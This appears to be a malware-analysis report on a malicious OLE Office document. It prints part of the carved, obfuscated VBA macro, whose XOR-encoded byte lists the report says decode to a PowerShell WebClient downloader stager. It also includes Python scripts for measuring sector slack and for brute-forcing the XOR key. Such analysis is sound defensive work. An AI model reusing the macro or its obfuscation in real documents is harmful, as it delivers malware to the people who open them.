MALICIOUS (risk score 62)

Heuristics (3)

- OLE document has large unaccounted-for region (severity: high, OLE_SLACK_ANOMALY). The OLE file is 95,232 bytes, but the streams its directory declares total only 35,342 bytes, so 59,890 bytes (63%) sit in sectors that no stream accounts for. Unallocated sector slack is the classic hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). Slack also accumulates benignly when Office rewrites or deletes streams without compacting the file, so treat the figure as a pointer to carve and inspect the unreferenced sectors rather than as a verdict on its own.
- VBA macros detected (severity: medium, OLE_VBA_MACROS). The document contains VBA macro code; the decoded source is the macros.bas artifact listed below.
- Embedded URL (severity: info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label records which channel (macro, JS, link annotation, document body, ...) reached it.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that Office writes into drawing parts, not an address the document contacts, so on its own it only indicates that drawing content is present.
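The OLE_SLACK_ANOMALY figure above is a simple subtraction, but reproducing it requires walking the Compound File header, FAT and directory. The script below is an added example, not the analyzer's own code: cfb_slack() reads those structures with the standard library only (offsets per the [MS-CFB] layout), sums the sizes the directory declares for its streams, and compares them with the file size and with the sectors the FAT actually allocates. build_cfb() constructs a minimal sample file (one stream plus trailing unreferenced sectors) so the check runs offline; the 95,232 and 35,342 byte figures fed to unaccounted() are the report's.

```python
"""Added example, not the analyzer's own code: reproduce the OLE_SLACK_ANOMALY
measurement on a Compound File Binary (OLE2) image with the standard library.
cfb_slack() reads the header, FAT and directory (offsets per [MS-CFB]), sums
the sizes the directory declares for its streams, and compares them with the
file size and with the sectors the FAT actually allocates. build_cfb() makes a
constructed sample with one stream plus trailing unreferenced sectors."""
import struct

MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FREESECT, ENDOFCHAIN, FATSECT = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD
NOSTREAM = 0xFFFFFFFF
STREAM, ROOT = 2, 5                                  # directory entry object types


def unaccounted(file_size: int, declared: int) -> tuple:
    """Bytes and rounded percentage of the file that no declared stream covers."""
    slack = file_size - declared
    return slack, round(100 * slack / file_size)


def cfb_slack(data: bytes) -> dict:
    """Declared-stream total vs. file size vs. FAT allocation for one OLE2 image."""
    if data[:8] != MAGIC:
        raise ValueError("not an OLE2/CFB file")
    major, _order, sector_shift = struct.unpack_from("<HHH", data, 0x1A)
    sec = 1 << sector_shift
    n_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    difat = struct.unpack_from("<109I", data, 0x4C)  # header holds the first 109 FAT sector numbers
    fat = []
    for s in difat[:n_fat]:
        fat.extend(struct.unpack_from(f"<{sec // 4}I", data, (s + 1) * sec))
    declared, seen, s = 0, set(), first_dir
    while s != ENDOFCHAIN and s not in seen:         # walk the directory chain
        seen.add(s)
        base = (s + 1) * sec
        for off in range(base, base + sec, 128):     # 128-byte directory entries
            if data[off + 0x42] == STREAM:
                size = struct.unpack_from("<Q", data, off + 0x78)[0]
                declared += (size & 0xFFFFFFFF) if major == 3 else size  # v3: low 32 bits only
        s = fat[s] if s < len(fat) else ENDOFCHAIN
    total = (len(data) - sec) // sec                 # sectors after the header
    allocated = sum(1 for i in range(total) if i < len(fat) and fat[i] != FREESECT)
    slack, pct = unaccounted(len(data), declared)
    return {"file_size": len(data), "declared_stream_bytes": declared,
            "unaccounted_bytes": slack, "unaccounted_pct": pct,
            "unallocated_sectors": total - allocated}


def build_cfb(stream: bytes, hidden: bytes) -> bytes:
    """Constructed sample: header, one FAT sector, one directory sector, one stream
    (>= 4096 bytes so it lives in regular sectors, not the mini stream), then
    `hidden` appended in sectors the FAT marks free."""
    sec = 512
    if len(stream) < 4096:
        raise ValueError("stream must be >= 4096 bytes to avoid the mini stream")
    n_stream = -(-len(stream) // sec)
    chain = list(range(3, 2 + n_stream)) + [ENDOFCHAIN]   # sectors 2.. hold the stream
    fat = [FATSECT, ENDOFCHAIN] + chain                   # sector 0 = FAT, sector 1 = directory
    fat += [FREESECT] * (sec // 4 - len(fat))
    hdr = bytearray(sec)
    hdr[:8] = MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)   # minor, major, order, shifts
    struct.pack_into("<IIIII", hdr, 0x28, 0, 1, 1, 0, 4096)        # dir secs, FAT secs, first dir, txn, cutoff
    struct.pack_into("<IIII", hdr, 0x3C, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<I", hdr, 0x4C, 0)                           # DIFAT[0]: the FAT is sector 0
    for i in range(1, 109):
        struct.pack_into("<I", hdr, 0x4C + 4 * i, FREESECT)

    def entry(name, etype, child, start, size):
        e = bytearray(128)
        n = name.encode("utf-16le") + b"\0\0"
        e[:len(n)] = n
        struct.pack_into("<HBBIII", e, 0x40, len(n), etype, 1, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 0x74, start, size)
        return bytes(e)

    directory = (entry("Root Entry", ROOT, 1, ENDOFCHAIN, 0)
                 + entry("Data", STREAM, NOSTREAM, 2, len(stream)) + bytes(2 * 128))
    body = stream.ljust(n_stream * sec, b"\0")
    hidden = hidden.ljust(-(-len(hidden) // sec) * sec, b"\0")
    return bytes(hdr) + struct.pack(f"<{sec // 4}I", *fat) + directory + body + hidden


if __name__ == "__main__":
    print("report figures:", unaccounted(95232, 35342))
    print("padded sample:", cfb_slack(build_cfb(b"A" * 5000, b"\x90" * 10240)))
    print("clean sample: ", cfb_slack(build_cfb(b"A" * 5000, b"")))
```

The clean sample still reports about 1.6 KB unaccounted for (header, FAT and directory sectors plus rounding the stream up to a sector boundary), which is why the heuristic has to judge the ratio and the count of genuinely unallocated sectors rather than the raw difference; at 63% and tens of kilobytes the sample above is far past that floor.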
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13527 bytes | 9c7e38a28afc250b46b1dc7365196a9cd635e912ad21880d2c2a415f3a0cdff7 |

Preview script (first 1,000 lines of the extracted script; the preview itself is cut off below). The source is reproduced exactly as carved: junk arithmetic on undefined variables, kept from raising by On Error Resume Next, is interleaved with string fragments that each function concatenates into a comma-separated list of decimal byte values.
Attribute VB_Name = "oNCqXMRhct"
Function vvhoiOiw()
On Error Resume Next
zzTjo = Sqr(36363)
tHAkTw = 16527 + FaozwK + (11468 * CDbl(UJpmw) - PVmHuH / CSng(43666) - MtaUCO / Hex(TGfrk) + 6647 - 46238)
fQvFs = wMEAPN - uXiHr / 99156 / DJvLl - 223327908 + Hex(wmHbbh) * COJYz - Round(42557)
IzNzw = mKnUVC
uJpAbEBHRb = "HeLL ( (" + " 4" + "6 ,100 ,96 ,123" + " , 94, 102" + ", 105 ,42 " + ",55 ,42, 100" + ", 111" + ",125 ,39," + " 101," + " 104, 9"
QnBzwP = Sqr(32383)
RHVUjT = 3046 + LEdZho + (23265 * CDbl(NFKVJf) - iFqvh / CSng(35582) - lPmsH / Hex(sppdUG) + 19481 - 79389)
Tflzn = sYURA - NnohR / 78255 / PhACV - 223327908 + Hex(koDtj) * uUPSN - Round(40702)
VtbqVp = dcVLp
nawllioajlA = "6 , 111,105 ,12" + "6 , 4" + "2, 120,107 ,10" + "0 ,110 ,1" + "01" + ",103" + ", 49,46,1" + "04 , 96, 64, "
aPtCY = Sqr(74486)
IrBTTc = 31087 + Dapikv + (12502 * CDbl(wUbMUk) - SbANMz / CSng(98881) - EaDNC / Hex(vzkES) + 2295 - 97703)
XHLYt = rTPDjD - lEhiD / 58351 / VrHBi - 223327908 + Hex(KBlTJZ) * CjSrp - Round(17375)
EZzFAp = WkdzT
ZQLca = "82," + "125,89,42 , " + "55" + " ,42 ,100,11" + "1,1" + "25, 39,101" + ",104 " + ",96, 111 , 105"
HfFVR = Sqr(71353)
njAJpu = 46391 + hwtGrN + (9352 * CDbl(qtutzp) - FPlQo / CSng(58432) - HLfcO / Hex(ShzOM) + 24049 - 96077)
SDAkwJ = uDdjMi - ibOzES / 16789 / fhmrww - 223327908 + Hex(fuXtMp) * irQrY - Round(75391)
DfUBmz = WWhLwu
lqaKKD = " ,126 ,42,8" + "9 , 115 , 121, " + "126 ,111" + " ,103 , 36,68" + " ," + " 1" + "11,126,36,93" + ", 1" + "11,104 , 73 , 1" + "02,99 , 111, 1"
jCkzG = Sqr(39956)
XTzGL = 92100 + XiMTR + (98882 * CDbl(zWiNuV) - uEmXOZ / CSng(61415) - YKbiPj / Hex(tJfcc) + 47574 - 4494)
zXMcdP = izWij - Bsnjs / 73202 / ZhStXs - 223327908 + Hex(GVdbZT) * KDRmFw - Round(67037)
ldzTkZ = rWMSi
MopqomK = "00 , 126,4" + "9 ,46,100 ,70," + "78, 127 ," + " 127, 80," + "42, " + "55," + " 42,45 ,98, 1" + "26 , 126 , 122"
vvhoiOiw = uJpAbEBHRb + nawllioajlA + ZQLca + lqaKKD + MopqomK
End Function
Function MBMLXoVl()
On Error Resume Next
UXztD = Sqr(36317)
FTEkb = 9584 + TvFPY + (83029 * CDbl(Vzmptz) - MviAYR / CSng(13256) - WFbXsw / Hex(hVUdOP) + 20590 - 84866)
wQTtXW = CnFqYA - AwqXPR / 41275 / jjBDJ - 223327908 + Hex(BRNYDa) * GZEaLk - Round(33620)
iFzpsO = OAFUsO
wIsff = " ,48, 37" + " , 37 " + ", 125, 125," + "125 ,36, 10" + "1,12" + "5, 100," + " 98, "
GQSZZ = Sqr(715)
hjrUME = 3525 + sRVZL + (88604 * CDbl(lzDjD) - aKPLY / CSng(24624) - IrkBSu / Hex(pMFwj) + 30101 - 39862)
ZlVEI = YcIor - NBhTH / 32345 / jYrEA - 223327908 + Hex(EKEwsz) * bkSzfN - Round(72477)
IYlskT = JWoBI
aYkucR = "99 , 124,111 ," + "36, " + "105 ,101, 103 ," + "37,71,121, 93" + ", 71 ,56 , 7" + "2, 58,37 ,74, " + "98 ,12" + "6,126, " + "122,48 , 37,"
HjVkri = Sqr(60846)
RwijV = 31921 + wUdQp + (7845 * CDbl(cjinuf) - SotuL / CSng(97238) - vfBjqj / Hex(lkSKw) + 64245 - 43719)
JRdCwK = mKSGAo - jwUnqz / 30449 / zziWjN - 223327908 + Hex(bHTQp) * ONjLbv - Round(62739)
QkzKo = HOYzLI
KliBC = " 37" + " ,125," + " 12" + "5 ,125," + " 36, 9" + "8 , 111, 107 ," + "102 ,126" + " ,98,115, 36," + " 109, 103"
Hwcmab = Sqr(45748)
UfYcdb = 25288 + KnkzjU + (70483 * CDbl(cPDjcT) - IOAPB / CSng(22779) - jjOMu / Hex(IizUTR) + 37551 - 75534)
rDBIPO = LLWHHA - WaCjtR / 66233 / LzjWG - 223327908 + Hex(nPlcI) * XJtZs - Round(40066)
iaWHf = XPDnja
zNBFZ = " , " + "121,126, 1" + "01 ,36,105" + ",101 ," + " 103 ,37, "
MBMLXoVl = wIsff + aYkucR + KliBC + zNBFZ
End Function
Function coAVE()
On Error Resume Next
hhqJM = Sqr(38396)
ubrBY = 85736 + YXwli + (97967 * CDbl(NNhdoY) - YHQnDm / CSng(69409) - mfruCL / Hex(RrAzNw) + 73864 - 22682)
FIKWT = OUGWul - tkwiR / 91895 / coKzmv - 223327908 + Hex(GWvaR) * Ymlrp - Round(53925)
JIuMj = WaBjth
hwzoQRiGBil = "73,99,97 " + ", 97 ,76 , 125" + " , 62, 37, 74, " + "98 , " + "126"
uZiCHw = Sqr(59746)
dQwKjX = 36693 + wKwdS + (84795 * CDbl(wFtpF) - zuUwk / CSng(1987) - JmoiAo / Hex(VnjFEX) + 39884 - 64089)
CLQjW = OwWazL - Ndiwm / 20253 / nlhsP - 223327908 + Hex(ZXCwl) * HajoY - Round(27911)
cftqCB = PzkHrR
EwuuYi = ",126 ,122 , 48" + ",37 " + ",3"
... (truncated)
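Each function in the preview returns a comma-separated list of decimal byte values, the only values that are not dead code. The script below is an added example, not part of the report or of oletools: it copies the string-building lines of Function vvhoiOiw from the preview above, statically evaluates the concatenation named in its return line, pulls the numbers out (the "HeLL ( (" prefix carries no digits and is dropped; how the macro's own decoder treats it is not visible in the preview), and brute-forces a single-byte XOR key. The report never states a key, so the key is inferred by scoring each candidate plaintext for printable ASCII and for downloader vocabulary; the keyword list is my choice.

```python
"""Added example, not part of the report or of oletools: statically rebuild the
string that Function vvhoiOiw returns and brute-force the single-byte XOR key
that turns its decimal byte list into text. The report never states a key;
the macro's own decoder is not in the preview, so the key is inferred here."""
import re
from typing import Dict, List, Tuple

# String-building lines of Function vvhoiOiw, copied from the preview above
# (two of the junk arithmetic lines are kept to show that they are skipped).
VBA_SAMPLE = r'''
Function vvhoiOiw()
On Error Resume Next
zzTjo = Sqr(36363)
tHAkTw = 16527 + FaozwK + (11468 * CDbl(UJpmw) - PVmHuH / CSng(43666) - MtaUCO / Hex(TGfrk) + 6647 - 46238)
uJpAbEBHRb = "HeLL ( (" + " 4" + "6 ,100 ,96 ,123" + " , 94, 102" + ", 105 ,42 " + ",55 ,42, 100" + ", 111" + ",125 ,39," + " 101," + " 104, 9"
nawllioajlA = "6 , 111,105 ,12" + "6 , 4" + "2, 120,107 ,10" + "0 ,110 ,1" + "01" + ",103" + ", 49,46,1" + "04 , 96, 64, "
ZQLca = "82," + "125,89,42 , " + "55" + " ,42 ,100,11" + "1,1" + "25, 39,101" + ",104 " + ",96, 111 , 105"
lqaKKD = " ,126 ,42,8" + "9 , 115 , 121, " + "126 ,111" + " ,103 , 36,68" + " ," + " 1" + "11,126,36,93" + ", 1" + "11,104 , 73 , 1" + "02,99 , 111, 1"
MopqomK = "00 , 126,4" + "9 ,46,100 ,70," + "78, 127 ," + " 127, 80," + "42, " + "55," + " 42,45 ,98, 1" + "26 , 126 , 122"
vvhoiOiw = uJpAbEBHRb + nawllioajlA + ZQLca + lqaKKD + MopqomK
End Function
'''

STR_LIT = re.compile(r'"((?:[^"]|"")*)"')        # VBA literal; "" is an escaped quote
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
# Vocabulary of the downloader one-liners such macros drop (my choice of tokens).
KEYWORDS = (b"new-object", b"webclient", b"downloadfile", b"http", b"powershell", b"invoke")


def string_assignments(vba: str) -> Dict[str, str]:
    """var -> value for every line whose right-hand side is only literals joined by '+'."""
    values: Dict[str, str] = {}
    for line in vba.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        var, rhs = m.groups()
        literals = STR_LIT.findall(rhs)
        leftover = re.sub(r"[\s+]", "", STR_LIT.sub("", rhs))
        if literals and not leftover:              # junk arithmetic lines fail this test
            values[var] = "".join(s.replace('""', '"') for s in literals)
    return values


def function_return(vba: str, name: str, values: Dict[str, str]) -> str:
    """Evaluate the 'name = A + B + C' return line by concatenating the resolved fragments."""
    m = re.search(rf"^\s*{re.escape(name)}\s*=\s*(.+?)\s*$", vba, re.M)
    if not m:
        raise ValueError(f"no return assignment for {name}")
    return "".join(values[v.strip()] for v in m.group(1).split("+"))


def number_list(text: str) -> List[int]:
    """Pull the decimal byte list out of the string; 'HeLL ( (' and spacing are ignored."""
    nums = [int(n) for n in re.findall(r"\d+", text)]
    if any(n > 255 for n in nums):
        raise ValueError("value above 255: not a plain byte list")
    return nums


def score(candidate: bytes) -> int:
    """Printable ASCII scores +1, anything else -10, each keyword hit +50."""
    base = sum(1 if 32 <= b < 127 else -10 for b in candidate)
    low = candidate.lower()
    return base + 50 * sum(low.count(k) for k in KEYWORDS)


def best_xor_key(nums: List[int]) -> Tuple[int, str]:
    """Try all 256 single-byte keys and return (key, plaintext) for the best-scoring one."""
    data = bytes(nums)
    key = max(range(256), key=lambda k: score(bytes(b ^ k for b in data)))
    return key, bytes(b ^ key for b in data).decode("latin-1")


def decode_function(vba: str, name: str) -> Tuple[int, str]:
    """End-to-end: fragments -> byte list -> XOR brute force."""
    return best_xor_key(number_list(function_return(vba, name, string_assignments(vba))))


if __name__ == "__main__":
    key, text = decode_function(VBA_SAMPLE, "vvhoiOiw")
    print(f"key=0x{key:02x} {text!r}")
```

Run against the first function only, the byte list resolves under a single-byte key to the opening of a PowerShell stager that instantiates System.Net.WebClient and starts assigning a URL string; the fragment ends exactly where the macro line does, so the rest of that URL lives in the parts of the macro the preview does not show. The same routine applies unchanged to the other functions in the artifact (they share the pattern of junk lines plus fragments), which is the point of evaluating the concatenation statically rather than pattern-matching individual literals.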